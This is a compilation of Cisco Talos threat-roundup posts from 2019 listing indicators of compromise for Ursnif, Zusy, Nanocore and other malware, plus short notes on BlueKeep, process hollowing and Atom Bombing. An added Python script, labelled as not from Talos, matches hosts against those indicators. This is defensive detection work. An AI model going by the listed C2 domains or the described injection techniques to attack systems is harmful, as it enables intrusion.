PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005 \nValue Name: PackedCatalogItem ` | 8 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004 \nValue Name: PackedCatalogItem ` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`180[.]254[.]253[.]254` | 8 \n`166[.]254[.]253[.]254` | 8 \n`135[.]254[.]253[.]254` | 8 \n`117[.]254[.]253[.]254` | 8 \n`119[.]254[.]253[.]254` | 8 \n`134[.]254[.]253[.]254` | 8 \n`206[.]254[.]253[.]254` | 8 \n`222[.]254[.]253[.]254` | 8 \n`182[.]254[.]253[.]254` | 8 \n`190[.]254[.]253[.]254` | 8 \n`184[.]254[.]253[.]254` | 8 \n`197[.]254[.]253[.]254` | 8 \n`66[.]44[.]141[.]253` | 8 \n`183[.]254[.]253[.]254` | 8 \n`158[.]254[.]253[.]254` | 8 \n`204[.]254[.]253[.]254` | 8 \n`230[.]254[.]253[.]254` | 8 \n`71[.]17[.]221[.]85` | 7 \n`217[.]209[.]16[.]149` | 7 \n`84[.]40[.]68[.]14` | 7 \n`75[.]64[.]4[.]243` | 7 \n`24[.]145[.]85[.]120` | 7 \n`83[.]233[.]106[.]6` | 7 \n`24[.]176[.]111[.]7` | 7 \n`24[.]92[.]71[.]93` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 8 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 8 
\n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 8 \n`%SystemRoot%\\assembly\\GAC_32\\Desktop.ini` | 8 \n`%SystemRoot%\\assembly\\GAC_64\\Desktop.ini` | 8 \n`\\$Recycle.Bin\\S-1-5-18` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 8 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 8 \n`%ProgramFiles%\\Windows Defender\\MSASCui.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpAsDesc.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpClient.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCmdRun.exe:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpCommu.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpEvMsg.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpOAV.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpRTP.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpSvc.dll:!` | 8 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 1d2d42263d68f09b1946be33971dcc04706ccc597993007b59806c3a23f1ffac 4f59080cc3450aab4dbfae69f1223e79069e3c315bac2df45ea845a68439bcde 559ecb68cce08a6d1d5b27d96295fc81ddc3df2edf1dbf3d765a9831262402c5 907c8629bcd73adf85f6163bacf17831830f0410f7e9840a146b364fb0bb2945 9117e953fe785d1b5c2f350921bd8ec6e14f1e34c0a26059c66c4abfb98e7a55 
a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27 b05d35fe02909b09b6a2c347f619430495530617f209ddba7b357db26cd154d1 d038daa7418565e12cd449a5c13d9f36eef7c3cf76c7739db4f41df68649837f e8a06267aade079e638ab09d0ca9b2697079be1292c237846f93bf802d9c8746 ec683faba46071aa2c11667714ee9d1abbbc1b4a6d6d024b77fc97e497eb5673 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4lFJDJcAbnw/XcWXOsNexPI/AAAAAAAAC6E/Rqxlj5HTIx0eNcQRTj_FcSjvhL_0AFG_gCLcBGAsYHQ/s1600/a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (47418) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (522) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. 
Atoms placed in the global atom table are accessible from any process. Malware abuses this by storing shellcode in a global atom, then queuing an asynchronous procedure call (APC) in a target process; when a thread of the target runs the APC, it retrieves the atom's contents and executes the shellcode. The Dridex malware family is known to use Atom Bombing, but other threats may leverage it as well.

**Process hollowing detected** (244)
Process hollowing is a technique used to run a payload under the identity of a legitimate process while keeping the payload off disk and away from static analysis. In typical usage, the malware unpacks its obfuscated or encrypted contents into memory, starts a legitimate child process in a suspended state, unmaps the child's original image and writes the unpacked payload in its place, then resumes the child so the payload executes under the legitimate process's name.

**Kovter injection detected** (196)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless: the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect the use of monitoring software such as Wireshark and of sandboxes, and reports this to its C2. It spreads through malicious advertising and spam campaigns.

**Installcore adware detected** (99)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

**Excessively long PowerShell command detected** (90)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

**Gamarue malware detected** (89)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

**Fusion adware detected** (43)
Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware is known to sometimes download and install malware.

**Reverse http payload detected** (33)
An exploit payload intended to connect back to an attacker-controlled host over HTTP has been detected.

**Dealply adware detected** (31)
DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on web pages. Adware has also been known to download and install malware.

Source: Cisco Talos blog, "Threat Roundup for November 1 to November 8", published 2019-11-08 (id TALOSBLOG:97F975C073505AE88655FF1C539740A6, <http://feedproxy.google.com/~r/feedburner/Talos/~3/C8d5TejfTdU/threat-roundup-1101-1108.html>). CVE list: CVE-2019-0708; CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

* * *

Source: Cisco Talos blog, threat roundup last seen 2019-09-20.

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 13 and Sept. 20.
As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d84d64770d43.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Dropper.Ursnif-7171615-0 | Dropper | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Malware.Zusy-7171614-1 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Malware.Nanocore-7171596-1 | Malware | Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Malware.Emotet-7171351-0 | Malware | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.
Win.Trojan.XtremeRAT-7170522-1 | Trojan | XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
Win.Downloader.Upatre-7170342-1 | Downloader | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware.
Win.Trojan.Gh0stRAT-7170222-1 | Trojan | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Packed.Blackshades-7168564-1 | Packed | Blackshades is a prevalent trojan with many capabilities including logging keystrokes, recording video from webcams, and downloading and executing additional malware.
Win.Ransomware.Cerber-7168312-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns this is no longer the case.

* * *

## Threat Breakdown

### Win.Dropper.Ursnif-7171615-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\IAM` Value Name: `Server ID` | 20
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `appmmgmt` | 20
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` Value Name: `Install` | 20
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` Value Name: `Scr` | 20
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` Value Name: `Client` | 20
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` Value Name: `Temp` | 20
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` Value Name: `{F50EA47E-D053-EF14-82F9-0493D63D7877}` | 20
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` Value Name: `{6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}` | 20

Mutexes | Occurrences
---|---
`Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 20
`Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 20
`Local\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 20
`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 20
`{5B703C72-FEE9-4509-E0BF-12491463668D}` | 20

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`104[.]20[.]0[.]85` | 10
`104[.]20[.]1[.]85` | 10
`216[.]218[.]185[.]162` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]ietf[.]org` | 20
`networkinpreinformation[.]in` | 20

Files and or directories created | Occurrences
---|---
`%APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\prefs.js` | 20
`\{4BC230AC-2EB3-B560-90AF-42B9C45396FD}` | 20
`%APPDATA%\ds32mapi` | 20
`%APPDATA%\ds32mapi\dhcpxva2.exe` | 20
`%TEMP%\<random, matching [A-F0-9]{3,4}>` | 20
`%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat` | 20

#### File Hashes

```
11319f1628f825ee4d742eba134c1ef13f8c1a8347ecc58c9307631b1cf976f9
294b4d3a2a266b214d08237057231398e90db1c615470ed79e965ac2cf2f3f41
3828b71130a42ba1300b528c38d29217adbea7439f125a1ad8ccdaba210fa8f1
410391bb11c0ba164309a084cdcde503a9d88eac9cff7db37c1bb093e8e28f35
46b011edbfc2c0bc67f2e0220c475d78d26d792b16b66dbebef5b21c4a8b0f9e
7712f643f1f23f42e2bb3aa8de85f79641b4e8217b6411729f1edfa59057821a
8cb87415a2b184915ce8fd746e9322e4ffceb01c3f92ea0399c94c65394418fd
9046f36247c7cae4170c0e96c5e7e977ee8a3080ca8bcad90082be29684e4469
9a77b01056bd9fad89171f8917305ad10fa10bd38dac4646de194bd24b8e6894
a017725c2c204c738d0f50f60954d5450102e4414508493a704303ae8f6e7513
bb2cede8c20d3b8a4b404d153dcfcd3076d24e11a5c6d83e6a28b1de92db8c1f
c34de7caf7fcda02d8c6de4cdbc7e92f16111e7de26b353f4025f4f16b21fa30
c611a64861e798aabf93ae732a457ff451c9deeabb6d63ee7dfd543ad084e6af
c6ed641a2900c11e90c547a79c2e3a01dcb5d8dab1f8b59ee086c06f0375c566
d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69
d8916bb5c067fb78f96cad273e79e71c642040f81c9430c6c5ed852f0fe028ba
da953a7b6829d0bf48220aed2f4c4b7498bba47d451f6b9065f6b302ef595da7
deb5817310aafedceddcab3d9ec44728aa46d68f840f177369cd717824936f58
ed12000dfd566a0b18e5fe8789bdcb2a2d121556445ac1cd4506f0aa4de6bb2a
f4f92fe38729a0c7b2378e2c8c0970ce7ebd18590b59b57c2134e4021fec1a1b
```

#### Coverage

Product | Protection
---|---
AMP | ✓
Cloudlock | N/A
CWS | ✓
Email Security | ✓
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | ✓
Umbrella | N/A
WSA | N/A

(✓ marks products the original post showed with a check-mark image; N/A means not applicable.)

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-b-mSpt7yJ8Q/XYTrAo4ZMeI/AAAAAAAACow/TO0GR_afZbgMYyTEPawl5n2CBXzm3rkmgCLcBGAsYHQ/s1600/d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/-3oRsiSrXwdg/XYTrEVsIHRI/AAAAAAAACo0/_MGHzsFbeEEESWDFRKCTr1sspVj0QIjzwCLcBGAsYHQ/s1600/d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69_tg.png>)

* * *

### Win.Malware.Zusy-7171614-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `DA81EF4C` | 8

Mutexes | Occurrences
---|---
`DA81EF4C` | 11
`\BaseNamedObjects\7E1FD194` | 7

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`216[.]218[.]185[.]162` | 7

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`insamertojertoq[.]cc` | 11
`yxjsibeugmmj[.]com` | 7

Files and or directories created | Occurrences
---|---
`%HOMEPATH%\AppData\LocalLow\DA81EF4C` | 8
`%APPDATA%\DA81EF4C` | 8
`%APPDATA%\DA81EF4C\bin.exe` | 8
`%APPDATA%\7E1FD194\bin.exe` | 7

#### File Hashes

```
08663c9807b4d858fece615d7e7f132379a7c5652cacbf6584e9adbfd3b6654e
200867228d35c8f4cef7a014221e41c3232fde37f9119c8fa8d30d1121542002
32d41afc1fa28125eb77360dc293184ab6c56ad4259740fef05649f1fcefa82a
3fb0877ce9376e5756ccc847681ccd20a72673655c24814e879556d5ea3e7283
40f210bce6a972939fa3b6874d73d6fb96c654d51cc98464ef87df6002f69f21
a0c05cd49cfd545f35985f45d386a7efcc745a3f87a759b3a94e0dcf864fa60e
a2312f676b9b508693f3605549b8ff33286ad61511f4a0a589ef5abeb125b24d
aa658c20abd212e39434eb31193c32f09ad39454fa88e242976b619f0681d825
ba39439230cdae8c0f0777cb5a8c0d78a825e4a2820f5da439b2f1ce0d4f3522
bd672bc43098f150874d6d691465eaea12314cb9134deec98525c39cce699fb8
d38a938e9a36c1cdcc1bbe2cf8a5da54b7572a94a37e1b0c0911b6d77d975f0a
```

#### Coverage

Product | Protection
---|---
AMP | ✓
Cloudlock | N/A
CWS | ✓
Email Security | ✓
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | ✓
Umbrella | ✓
WSA | ✓

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-EjyKxcTCvEk/XYTt5S4XwtI/AAAAAAAACpA/jExQSiko3hE89N6Roy2TZnc9X32uCJh6wCLcBGAsYHQ/s1600/d38a938e9a36c1cdcc1bbe2cf8a5da54b7572a94a37e1b0c0911b6d77d975f0a_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/-KcZ1YZKMKCQ/XYTt9TFmjvI/AAAAAAAACpE/aJCRHEVaXO0ayiZk4lzlpwRA4pkyhZQbQCLcBGAsYHQ/s1600/bd672bc43098f150874d6d691465eaea12314cb9134deec98525c39cce699fb8_tg.png>)

Umbrella: [detection screenshot](<https://1.bp.blogspot.com/-ojlkO1q4uok/XYTuU8gXWaI/AAAAAAAACpQ/oBro8khmTP4JG3hztrSXI54DWeGk6-wzgCLcBGAsYHQ/s1600/611775ea338d98e74f242e43456f4f4e1e35c9f95667c202ff8369b478e2ea24_umbrella.png>)

* * *
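The IOC tables in this roundup follow a fixed convention: IPs and domains are defanged with `[.]`, file paths are written with Windows environment variables such as `%APPDATA%`, and variable names appear as `<random, matching 'regex'>`. The Python below is an added example, not code from Cisco Talos or from the roundup, that turns rows in that shape into matchers and sweeps a host's artifacts with them. The rows it embeds are copied from the Zusy table above and from the Ursnif and Emotet file tables in this roundup; the default locations assigned to the path variables, the hive-name normalisation and the sample host observations are assumptions constructed for the example.

```python
# Sweep host artifacts with IOC rows in the Talos roundup table shape.
# Added example, not Talos code; rows, path defaults and host data are constructed.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# CONSTRUCTED input in the roundup's table shape: "<kind> | Occurrences",
# a "---|---" delimiter, then "`indicator` | count" rows. Registry rows carry
# the value name after the key, as the post prints it.
IOC_TABLES = r"""
Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: DA81EF4C` | 8
Mutexes | Occurrences
---|---
`DA81EF4C` | 11
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`216[.]218[.]185[.]162` | 7
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`insamertojertoq[.]cc` | 11
Files and or directories created | Occurrences
---|---
`%APPDATA%\DA81EF4C\bin.exe` | 8
`%TEMP%\<random, matching [A-F0-9]{3,4}>` | 20
`%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 18
"""

KIND_BY_HEADER = {"Registry Keys": "registry", "Mutexes": "mutex", "IP Addresses": "ip",
                  "Domain Names": "domain", "Files and or directories": "file"}
PLACEHOLDER = re.compile(r"<random, matching '?(.*?)'?>")
ROW = re.compile(r"^`(?P<ind>.*?)`\s*\|\s*(?P<n>\d+)\s*$")
HIVES = {"HKEY_LOCAL_MACHINE": "<HKLM>", "HKEY_CURRENT_USER": "<HKCU>",
         "HKEY_USERS": "<HKU>", "HKEY_CLASSES_ROOT": "<HKCR>"}

# Regex fragments for the path variables the tables use. The default
# locations are an ASSUMPTION for a stock install; adjust per environment.
_USER = re.escape(r"C:\Users") + r"\\[^\\]+"          # any profile directory
PATH_VARS = {
    "%SYSTEMROOT%": re.escape(r"C:\Windows"),
    "%SYSTEM32%": re.escape(r"C:\Windows\System32"),
    "%PROGRAMDATA%": re.escape(r"C:\ProgramData"),
    "%PROGRAMFILES%": re.escape(r"C:\Program Files"),
    "%PROGRAMFILES(X86)%": re.escape(r"C:\Program Files (x86)"),
    "%HOMEPATH%": _USER,
    "%APPDATA%": _USER + re.escape(r"\AppData\Roaming"),
    "%TEMP%": _USER + re.escape(r"\AppData\Local\Temp"),
}


@dataclass(frozen=True)
class Ioc:
    kind: str
    indicator: str              # as printed: defanged, with placeholders
    value_name: Optional[str]
    occurrences: int
    pattern: "re.Pattern[str]"


@dataclass(frozen=True)
class Observation:
    kind: str
    value: str
    value_name: Optional[str] = None


def _literal(text: str) -> str:
    """Escape literal text, swapping %VAR% tokens for their regex fragments."""
    return "".join(PATH_VARS.get(tok.upper(), re.escape(tok))
                   for tok in re.split(r"(%[A-Za-z0-9()]+%)", text))


def indicator_to_regex(kind: str, indicator: str) -> "re.Pattern[str]":
    """Anchored, case-insensitive regex for one table indicator."""
    if kind in ("ip", "domain"):
        indicator = indicator.replace("[.]", ".")       # refang
    parts, pos = [], 0
    for m in PLACEHOLDER.finditer(indicator):
        parts.append(_literal(indicator[pos:m.start()]))
        parts.append("(?:" + m.group(1) + ")")          # Talos supplies a regex here
        pos = m.end()
    parts.append(_literal(indicator[pos:]))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def parse_ioc_tables(text: str) -> List[Ioc]:
    iocs, kind = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("---"):
            continue
        m = ROW.match(line)
        if m is None:                                   # "<kind> | Occurrences" header
            header = line.split("|")[0].strip()
            kind = next((k for h, k in KIND_BY_HEADER.items() if header.startswith(h)), None)
            continue
        if kind is None:
            raise ValueError("row before any known header: " + line)
        ind, value_name = m.group("ind").strip(), None
        if kind == "registry":
            ind, _, value_name = ind.partition(" Value Name: ")
            ind, value_name = ind.strip(), value_name.strip() or None
        iocs.append(Ioc(kind, ind, value_name, int(m.group("n")), indicator_to_regex(kind, ind)))
    return iocs


def normalize_registry_key(key: str) -> str:
    """Rewrite a full hive name to the <HKxx> form the tables use."""
    hive, sep, rest = key.partition("\\")
    return HIVES.get(hive.upper(), hive) + sep + rest


def scan(observations: List[Observation], iocs: List[Ioc]) -> List[Tuple[Observation, Ioc]]:
    hits = []
    for obs in observations:
        value = normalize_registry_key(obs.value) if obs.kind == "registry" else obs.value
        for ioc in iocs:
            if ioc.kind != obs.kind or not ioc.pattern.match(value):
                continue
            if ioc.value_name and (obs.value_name or "").lower() != ioc.value_name.lower():
                continue                                # same key, unrelated value
            hits.append((obs, ioc))
    return hits


# CONSTRUCTED observations from a hypothetical host: hits mixed with near-misses.
SAMPLE_HOST = [
    Observation("registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "DA81EF4C"),
    Observation("registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive"),
    Observation("mutex", "DA81EF4C"),
    Observation("domain", "insamertojertoq.cc"),
    Observation("domain", "www.ietf.org"),
    Observation("ip", "216.218.185.162"),
    Observation("file", r"C:\Users\alice\AppData\Roaming\DA81EF4C\bin.exe"),
    Observation("file", r"C:\Users\alice\AppData\Local\Temp\3F9A"),
    Observation("file", r"C:\Users\alice\AppData\Local\Temp\setup.log"),
    Observation("file", r"C:\Windows\SysWOW64\qzqrmdxk.exe"),
    Observation("file", r"C:\Windows\SysWOW64\kernel32.dll"),
]

if __name__ == "__main__":
    for obs, ioc in scan(SAMPLE_HOST, parse_ioc_tables(IOC_TABLES)):
        print(f"{obs.kind:8} {obs.value}  <=  {ioc.indicator} (seen {ioc.occurrences}x)")
```

Matches are anchored and exact, and registry rows also compare the value name, so an unrelated entry under the same `Run` key does not fire. Keep the roundup's own caveat in mind: a network row only says a sample contacted that address, so treat IP and domain hits as leads to pivot on rather than verdicts.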
### Win.Malware.Nanocore-7171596-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `AGP Manager` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE` Value Name: `Form1staf` | 25

Mutexes | Occurrences
---|---
`Global\{d7ce90e9-f292-46be-8e05-be37399391d6}` | 25

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`185[.]244[.]31[.]232` | 25

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`kennethecheazu[.]ddns[.]net` | 25

Files and or directories created | Occurrences
---|---
`%SystemRoot%\win.ini` | 25
`%ProgramFiles(x86)%\AGP Manager` | 25
`%ProgramFiles(x86)%\AGP Manager\agpmgr.exe` | 25
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 25
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs` | 25
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator` | 25
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat` | 25
`%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\AGP Manager\agpmgr.exe` | 25
`%TEMP%\Form1TIPPE.exe` | 25
`%TEMP%\Form1TIPPE.vbs` | 25
`%APPDATA%\8F793A96-DA80-4751-83F9-B23D8B735FB1\run.dat` | 18
`%ProgramFiles%\SCSI Host\scsihost.exe` | 18

#### File Hashes

```
186e0067550d5d1833c08c7dfd7d91e71d4d5e7d426ef3c7d1edce0554c6424c
202203455899333d624e633917a16b94ddf96eb6a03f284074aab4c1ed0c2218
3bb79bf9626bcf40d81afc303045cb4eb4267ffedee15840179aec2c50eeb82c
4c41af943d2a84a6644933e35e96342dd6195b7b9a33f6fb68c6b92949018e0a
5a1713269673c62544ea6f2a2b266d5df4ed331f1570b0dfc4aa33b3e79c5ce5
601e562e6ea29842ad3ddb246ad5f45250641d2502178c476bbefa19b3acb4e1
6d9d22a3cd4855e3673acbee8619ed213b0e330e6a4560976dda878b5101daec
73470e418c1a73792c06354c7b6d43b615d7ab246e0cff0d5dffbb2725bbfb64
76399c26a09d5953f2349c2c529fc74344160fbc639089dcab56c8409fe2bab5
8f3b8987dd405be851f06d6589ac9f9b9669ff60f5ca29e5eaa698fdd59259ef
8f54b0cb0c575486dd8ea255400b96c0d9c5f48cdf4023f6ffea59004847b627
973e1c1d3d264e764f374dc679852f27913f5afce497fa4d605118ab4e8e41d2
99f095cbbb7919e8fff151eb5175de2680b26dc94f91806343a2b48fce853f8a
